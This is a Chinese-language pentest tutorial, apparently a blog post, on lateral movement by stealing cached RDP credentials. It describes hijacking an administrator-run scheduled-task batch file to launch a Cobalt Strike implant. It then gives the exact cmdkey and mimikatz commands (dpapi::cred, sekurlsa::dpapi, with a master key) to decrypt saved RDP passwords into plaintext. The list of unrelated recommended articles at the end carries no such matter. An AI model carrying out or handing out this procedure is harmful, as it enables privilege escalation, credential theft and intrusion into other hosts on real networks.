内网横向之RDP缓存利用

RDP(远程桌面协议)在连接过程中会缓存凭据,尤其是在启用了 "保存密码" 或 "凭据管理器" 功能时。这个缓存的凭据通常是用于自动填充和简化后续连接的过程。凭据一般包含了用户的用户名和密码信息,或者是经过加密的身份验证令牌

所以我们想登录这个rdp缓存,就是先找到凭证,再通过mimikatz来解密凭证,获取明文

0x01 以administrator权限上线

WIN+R 输入taskschd.msc

打开任务计划程序

找到批处理文件(.bat) 是Administrator创建的,找到他的目录

写入cs马子

后在任务计划程序运行net.bat

就成功上线了

注意:不是说找到一个由administrator创建的.bat文件就行,而是说在计划任务中,这个由administrator创建的.bat可以以administrator的身份去运行。

0X02 找到RDP凭据

用administrator权限来执行下面的命令

复制代码
cmdkey /list

发现存在凭证后

再用里面的文件浏览功能

之后找到下面的凭据

再次说明,这个凭据是因为administrator在RDP其他主机的时候,选择了记住我的凭证功能,然后在本地保留了一个凭证

0x03 获取guidMasterKey

复制代码
privilege::debug
dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\F18D03964B3469BAEA4542A7792D663B

0x04 获取MasterKey对应的

复制代码
privilege::debug 
sekurlsa::dpapi

0x05 拿MasterKey进行解密

复制代码
 mimikatz dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\F18D03964B3469BAEA4542A7792D663B /masterkey:2af578e7d889e691901422cabdd559e42d0a03882073e7ca46abc03422547ec7108113dc8928326cc181c69b6eff2fa7d87a06254474f0a892f9c183d56aae55

找到明文密码 就可以登录,达到横向移动->RDP的渗透手法

相关推荐
清汤饺子2 小时前
OpenClaw 本地部署教程 - 从 0 到 1 跑通你的第一只龙虾
前端·javascript·vibecoding
爱吃的小肥羊5 小时前
比 Claude Code 便宜一半!Codex 国内部署使用教程,三种方法任选一!
前端
IT_陈寒6 小时前
SpringBoot项目启动慢?5个技巧让你的应用秒级响应!
前端·人工智能·后端
树上有只程序猿7 小时前
2026低代码选型指南,主流低代码开发平台排名出炉
前端·后端
橙某人7 小时前
LogicFlow 小地图性能优化:从「实时克隆」到「占位缩略块」!🚀
前端·javascript·vue.js
高端章鱼哥7 小时前
为什么说用OpenClaw对打工人来说“不划算”
前端·后端
大脸怪7 小时前
告别 F12!前端开发者必备:一键管理 localStorage / Cookie / SessionStorage 神器
前端·后端·浏览器
Mr_Mao7 小时前
我受够了混乱的 API 代码,所以我写了个框架
前端·api
小徐_23337 小时前
向日葵 x AI:把远程控制封装成 MCP,让 AI 替我远程控制设备
前端·人工智能
冴羽7 小时前
来自顶级大佬 TypeScript 之父的 7 个启示
前端·typescript